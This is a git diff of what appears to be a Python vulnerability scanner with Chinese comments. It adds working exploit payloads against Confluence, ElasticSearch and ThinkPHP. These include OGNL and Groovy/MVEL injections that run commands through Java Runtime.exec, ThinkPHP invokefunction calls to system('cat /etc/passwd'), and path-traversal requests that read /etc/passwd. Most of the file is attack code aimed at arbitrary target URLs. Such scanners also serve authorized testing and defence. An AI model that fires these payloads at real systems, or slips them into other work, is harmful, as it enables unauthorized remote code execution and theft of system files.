+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ((self.md in check.check_res(res.text, self.md))
+ or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ or (('' in res.text) and ('Confluence' in res.text))
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data,
+ 'Headers': headers
+ }
+ }
+ return results
+
+ def cve_2021_26084_scan(self, url):
+ ''' Confluence存在一个OGNL注入漏洞,
+ 允许未经身份验证的攻击者在Confluence服务器或数据中心实例上执行任意代码
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2021-26084'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2021_26084_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('369630' in res.text)
+ or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ # or ('Microsoft Corp' in res.text)
+ # or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data,
+ 'Headers': headers
+ }
+ }
+ return results
+
+ def cve_2015_8399_scan(self, url):
+ ''' tlassian Confluence 5.8.17之前版本中存在安全,
+ 该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件
+ 没有充分过滤'decoratorName'参数,
+ 远程攻击者可利用该漏洞读取配置文件
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead'
+ vul_info['vul_id'] = 'CVE-2015-8399'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in self.cve_2015_8399_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ((('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ or (('' in res.text) and ('Confluence' in res.text))
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path
+ }
+ }
+ return results
+
+ def cve_2022_26134_scan(self, url):
+ ''' 2022年6月2日Atlassian官方发布了一则安全更新, 通告了一个严重且已在野利用的代码执行漏洞,
+ 攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2022-26134'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in self.cve_2022_26134_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ res_md = "'X-Cmd-Response': '" + self.md
+ if (res_md in check.check_res(str(res.headers), res_md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path
+ }
+ }
+ return results
+
+ def addscan(self, url):
+ return [
+ thread(target=self.cve_2019_3396_scan, url=url),
+ thread(target=self.cve_2021_26084_scan, url=url),
+ thread(target=self.cve_2015_8399_scan, url=url),
+ thread(target=self.cve_2022_26134_scan, url=url)
+ ]
+
+confluence = AtlassianConfluence()
\ No newline at end of file
diff --git a/payloads/Django.py b/payloads/Django.py
index fa9ca12..f5bae97 100644
--- a/payloads/Django.py
+++ b/payloads/Django.py
@@ -363,7 +363,8 @@ def cve_2021_35042_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ((('OperationalError' in res.text) or ('DatabaseError' in res.text)) and ('Request information' in res.text)):
+ if ((('OperationalError' in res.text) or ('DatabaseError' in res.text))
+ and ('Request information' in res.text)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/ElasticSearch.py b/payloads/ElasticSearch.py
new file mode 100644
index 0000000..ddcf5d8
--- /dev/null
+++ b/payloads/ElasticSearch.py
@@ -0,0 +1,369 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ ElasticSearch扫描类:
+ 1. ElasticSearch 命令执行
+ CVE-2014-3120
+ Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/
+
+ 2. ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞
+ CVE-2015-1427
+ Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/
+
+ 3. ElasticSearch 目录穿越
+ CVE-2015-3337
+ Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
+
+ 4. ElasticSearch 目录穿越
+ CVE-2015-5531
+ Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+ # Elasticsearch写入webshell
+ # WooYun-2015-110216
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class ElasticSearch():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'ElasticSearch'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2014_3120_payloads = [
+ {
+ 'path': 'website/blog/',
+ 'data': '{"name": "mouse"}',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '_search?pretty',
+ 'data': '''{
+ "size": 1,
+ "query": {
+ "filtered": {
+ "query": {
+ "match_all": {
+ }
+ }
+ }
+ },
+ "script_fields": {
+ "command": {
+ "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\"COMMAND\\").getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();"
+ }
+ }
+}'''.replace('COMMAND', self.cmd),
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ self.cve_2015_1427_payloads = [
+ {
+ 'path': 'website/blog/',
+ 'data': '{"name": "mouse2"}',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '_search?pretty',
+ 'data': '{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"COMMAND\\").getText()"}}}'.replace('COMMAND', self.cmd),
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ self.cve_2015_3337_payloads = [
+ {
+ 'path': '_plugin/head/../../../../../../../../../etc/passwd',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ ]
+
+ self.cve_2015_5531_payloads = [
+ {
+ 'path': '_snapshot/mouse3',
+ 'data': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/mouse3"}}',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '_snapshot/mouse33',
+ 'data': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/mouse3/snapshot-backdata"}}',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '_snapshot/mouse3/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ def cve_2014_3120_scan(self, url):
+ ''' 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,
+ 而MVEL可执行Java代码, 而且没有沙盒, 所以我们可以直接执行任意代码
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2014-3120'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2014_3120_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ sleep(1)
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (self.md in check.check_res(res.text, self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data
+ }
+ }
+ return results
+
+ def cve_2015_1427_scan(self, url):
+ ''' ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,
+ 但显然官方的工作并没有做好, lupin和tang3分别提出了两种执行命令的方法
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2015-1427'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2015_1427_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ sleep(1)
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (self.md in check.check_res(res.text, self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data
+ }
+ }
+ return results
+
+ def cve_2015_3337_scan(self, url):
+ ''' 在安装了具有“site”功能的插件以后, 插件目录使用../即可向上跳转,
+ 导致目录穿越漏洞, 可读取任意文件, 没有安装任意插件的elasticsearch不受影响
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead'
+ vul_info['vul_id'] = 'CVE-2015-3337'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in self.cve_2015_3337_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path
+ }
+ }
+ return results
+
+ def cve_2015_5531_scan(self, url):
+ ''' elasticsearch 1.5.1及以前, 无需任何配置即可触发该漏洞;
+ 之后的新版, 配置文件elasticsearch.yml中必须存在path.repo, 该配置值为一个目录, 且该目录必须可写,
+ 等于限制了备份仓库的根位置, 不配置该值, 默认不启动这个功能
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead'
+ vul_info['vul_id'] = 'CVE-2015-5531'
+ # vul_info['vul_method'] = 'PUT/GET'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in range(len(self.cve_2015_5531_payloads)):
+ # path = payload['path']
+ # data = payload['data']
+ # headers = payload['headers']
+
+ path = self.cve_2015_5531_payloads[payload]['path']
+ data = self.cve_2015_5531_payloads[payload]['data']
+ headers = self.cve_2015_5531_payloads[payload]['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ if (payload in [0, 1]):
+ res = requests.put(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ continue
+
+ # elif payload == 2
+ sleep(0.5)
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (res.status_code == 400
+ and ('114, 111, 111, 116' in res.text)
+ and ('Failed to derive' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Prompt': 'ASCII decimal encode'
+ }
+ }
+ return results
+
+ def addscan(self, url):
+ return [
+ thread(target=self.cve_2014_3120_scan, url=url),
+ thread(target=self.cve_2015_1427_scan, url=url),
+ thread(target=self.cve_2015_3337_scan, url=url),
+ thread(target=self.cve_2015_5531_scan, url=url)
+ ]
+
+elasticsearch = ElasticSearch()
\ No newline at end of file
diff --git a/payloads/F5BIGIP.py b/payloads/F5BIGIP.py
index 620a9ec..b71fbac 100644
--- a/payloads/F5BIGIP.py
+++ b/payloads/F5BIGIP.py
@@ -107,7 +107,14 @@ def cve_2020_5902_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('encrypted-password' in res.text) or ('partition-access' in res.text) or (('"output": "' in res.text) and ('"error": "",' in res.text)) or ('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)):
+ if (('encrypted-password' in res.text)
+ or ('partition-access' in res.text)
+ or (('"output": "' in res.text) and ('"error": "",' in res.text))
+ or ('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -167,7 +174,9 @@ def cve_2022_1388_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('commandResult' in res.text) and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))):
+ if (('commandResult' in res.text)
+ and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/Fastjson.py b/payloads/Fastjson.py
index 5d6b5fa..212eff6 100644
--- a/payloads/Fastjson.py
+++ b/payloads/Fastjson.py
@@ -130,7 +130,7 @@ def cve_2017_18349_scan(self, url):
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'unSerialize'
- vul_info['vul_id'] = 'CVE-2017-18349'
+ vul_info['vul_id'] = 'CNVD-2017-02833'
vul_info['vul_method'] = 'POST'
vul_info['headers'] = {
'Content-Type': 'application/json'
diff --git a/payloads/Spring.py b/payloads/Spring.py
index 300d982..819bc71 100644
--- a/payloads/Spring.py
+++ b/payloads/Spring.py
@@ -306,7 +306,11 @@ def cve_2020_5410_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)):
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -446,7 +450,9 @@ def cve_2022_22947_scan(self, url):
)
logger.logging(vul_info, res3.status_code, res3) # * LOG
- if ((res3.status_code == 200) and (('/sbin/nologin' in res3.text) or ('root:x:0:0:root' in res3.text))):
+ if ((res3.status_code == 200)
+ and (('/sbin/nologin' in res3.text)
+ or ('root:x:0:0:root' in res3.text))):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -474,7 +480,7 @@ def addscan(self, url):
return [
thread(target=self.cve_2020_5410_scan, url=url),
thread(target=self.cve_2021_21234_scan, url=url),
- # thread(target=self.cve_2022_22965_scan, url=url),
+ thread(target=self.cve_2022_22965_scan, url=url),
thread(target=self.cve_2022_22963_scan, url=url),
thread(target=self.cve_2022_22947_scan, url=url)
]
diff --git a/payloads/ThinkPHP.py b/payloads/ThinkPHP.py
index 5234418..6e3e64e 100644
--- a/payloads/ThinkPHP.py
+++ b/payloads/ThinkPHP.py
@@ -19,15 +19,22 @@
暂无编号
Payload: https://vulhub.org/#/environments/thinkphp/in-sqlinjection/
+ 5. ThinkPHP5.x 远程代码执行
+ CVE-2018-1002015
+ Payload: https://www.cnblogs.com/defyou/p/15762860.html
+
其它奇奇怪怪的Payload: https://baizesec.github.io/
'''
+from lib.api.dns import dns
from lib.initial.config import config
-from lib.tool.md5 import md5
+from lib.tool.md5 import md5, random_md5
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
+from lib.tool import head
from thirdparty import requests
+from time import sleep
class ThinkPHP():
def __init__(self):
@@ -79,6 +86,19 @@ def __init__(self):
}
]
+ self.cve_2018_1002015_payloads = [
+ {
+ 'path': 'index.php?s=index/\\think\\Container/invokefunction',
+ 'data': 'function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'index.php?s=index/\\think\\Container/invokefunction',
+ 'data': 'function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
# * 以下payload没有找到测试环境, 所以没写poc, 哪个好心人提供一下环境QAQ
self.thinkphp_5_options_sqlinject_payloads = [
{
@@ -158,7 +178,10 @@ def cnvd_2018_24942_scan(self, url):
return None
# * 判断扫描结果
- if (self.md in check.check_res(res.text, self.md)) or (('PHP Version' in res.text) and ('PHP License' in res.text)):
+ if (self.md in check.check_res(res.text, self.md)
+ or (('PHP Version' in res.text)
+ and ('PHP License' in res.text))
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -212,7 +235,7 @@ def cnnvd_201901_445_scan(self, url):
return None
# * 判断扫描结果
- if self.md in check.check_res(res.text, self.md):
+ if (self.md in check.check_res(res.text, self.md)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -334,12 +357,72 @@ def thinkphp_5_ids_sqlinject_scan(self, url):
}
return results
+ def cve_2018_1002015_scan(self, url):
+ ''' ThinkPHP 5.0.23及5.1.31以下版本RCE
+ ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,
+ 该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤,
+ 远程攻击者可通过输入字符 \ 的方式调用任意方法利用该漏洞执行代码
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2018-1002015'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2018_1002015_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('root:x:0:0:root' in res.text)
+ or (('PHP Version' in res.text)
+ and ('PHP License' in res.text))
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data
+ }
+ }
+ return results
+
def addscan(self, url):
return [
thread(target=self.cnvd_2018_24942_scan, url=url),
thread(target=self.cnnvd_201901_445_scan, url=url),
thread(target=self.thinkphp_2_x_rce_scan, url=url),
- thread(target=self.thinkphp_5_ids_sqlinject_scan, url=url)
+ thread(target=self.thinkphp_5_ids_sqlinject_scan, url=url),
+ thread(target=self.cve_2018_1002015_scan, url=url)
]
thinkphp = ThinkPHP()
\ No newline at end of file
diff --git a/payloads/demo2.py b/payloads/demo2.py
new file mode 100644
index 0000000..cd55e3c
--- /dev/null
+++ b/payloads/demo2.py
@@ -0,0 +1,134 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ XXXXX扫描类:
+ XXXXX 未开启强制路由RCE
+ CNVD-2018-24942
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+file:///C:/Windows/System32/drivers/etc/hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class 1(): # ! 1: 类名(例如 ThinkPHP)
+ ''' 标有数字的地方都需要自己填写 '''
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers').copy()
+ self.proxies = config.get('proxies')
+
+ self.app_name = '2' # ! 2: 漏洞框架/应用程序/CMS等(例如 thinkphp)
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.3_payloads = [ # ! 3: Payload的名称(例如 cnvd_2018_24942_payloads)
+ {
+ 'path': '4', # ! 4: url路径(例如/admin/login)
+ 'data': '5', # ! 5: POST数据, 没有的话可以不写
+ 'headers': head.merge(self.headers, {}) # ! 6: Headers请求头, 填在{}里面, 字典形式; 没有的话可以不写, 不写的话将使用默认请求头; 如果存在同名的请求头, 则会覆盖掉原来的
+ },
+ ]
+
+ def 7_scan(self, url): # ! 7: POC的名称(例如 cnvd_2018_24942_scan)
+ ''' '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = '8' # ! 8: 漏洞类型(例如 RCE)
+ vul_info['vul_id'] = '9' # ! 9: 漏洞编号(例如 CNVD-2018-24942)
+ vul_info['vul_method'] = '10' # ! 10: 请求方式(例如 GET)
+
+ for payload in range(len(self.3_payloads)): # ! 3: 同上, Payload的名称
+ path = self.3_payloads[payload]['path'] # ! 3: 同上, Payload的名称
+ data = self.3_payloads[payload]['data'] # ! 3: 同上, Payload的名称
+ headers = self.3_payloads[payload]['headers'] # ! 3: 同上, Payload的名称
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ if payload == 0: # * 当payload为第1个时, 执行xxx操作
+ res = requests.11( # ! 11: 请求方式(例如 get)
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ elif payload == 1: # * 当payload为第2个时, 执行xxx操作
+ res = requests.11( # ! 11: 请求方式(例如 get)
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ '''!!!
+ 可以自定义results中的信息, 格式:
+ 标题: 值(str/list/dict)
+ str类型: key: value的格式进行显示
+ list类型: 会以key: value value value ...的格式进行显示
+ dict类型: 会以↓的格式进行显示
+ dict:
+ key1: value1
+ key2: value2
+ ...
+ '''
+ if ('12'): # ! 12: 判断扫描结果
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data,
+ 'Cookie': 'xxx',
+ 'Headers': headers
+ }
+ }
+ return results
+
+ def addscan(self, url):
+ return [
+ thread(target=self.6_scan, url=url) # ! 6: 同上, POC的名称
+ ]
+
+13 = 1() # ! 1: 同上, 类名
+
+'''
+ # ! 13: 对象名称
+ # ! 需要在vulcat/lib/initial/config.py加入对象名称, 找到以下代码并继续添加
+ app_list = ['alidruid', 'airflow', 'apisix', 'cisco', 'django', 'fastjson']
+ # ! 然后在vulcat/lib/core/coreScan.py引入POC, 引入方式为
+ from payloads.文件名 import 对象名称
+ # ! 引入完成后, 自定义POC就成功了, 可以运行vulcat试试效果
+'''
\ No newline at end of file